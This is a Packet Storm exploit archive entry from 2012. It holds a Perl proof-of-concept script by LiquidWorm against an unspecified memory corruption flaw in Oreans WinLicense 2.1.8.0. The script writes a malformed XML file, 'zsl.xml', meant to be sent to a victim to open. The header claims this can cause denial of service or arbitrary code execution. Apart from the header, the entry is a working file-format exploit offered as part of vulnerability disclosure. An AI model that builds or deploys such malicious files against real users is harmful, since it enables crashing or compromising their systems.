Lucene search

K
packetstormLiquidWormPACKETSTORM:111034
HistoryMar 21, 2012 - 12:00 a.m.

Oreans WinLicense 2.1.8.0 Memory Corruption

2012-03-2100:00:00
LiquidWorm
packetstormsecurity.com
23
`#!/usr/bin/perl  
#  
#  
# Oreans WinLicense v2.1.8.0 XML File Handling Unspecified Memory Corruption  
#  
#  
# Vendor: Oreans Technologies  
# Product web page: http://www.oreans.com  
# Affected version: 2.1.8.0 (32/64bit)  
#  
# Summary: WinLicense combines the same protection-level as Themida with the  
# power of advanced license control, offering the most powerful and flexible  
# technology that allows developers to securely distribute trial and registered  
# versions of their applications.  
#  
# Desc: WinLicense is prone to an unspecified memory corruption vulnerability.  
# An attacker can exploit this issue by tricking a victim into opening a malicious  
# XML file to execute arbitrary code and to cause denial-of-service conditions.  
#  
# Tested on: Microsoft Windows XP Professional SP3 (EN) (32bit)  
# Microsoft Windows 7 Ultimate SP1 (EN) (64bit)  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
# @zeroscience  
#  
#  
# Advisory ID: ZSL-2012-5080  
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5080.php  
#  
#  
# 20.03.2012  
#  
#  
  
use strict;  
  
my $file = "zsl.xml";  
my $hit = "Joxy-\\x\\-Poxy";  
print "\n\n[*] Creating $file file...\n";  
open ZSL, ">./$file" || die "\nCan't open $file: $!";  
print ZSL $hit;  
print "\n[.] File successfully mounted!\n\n";  
close ZSL;  
`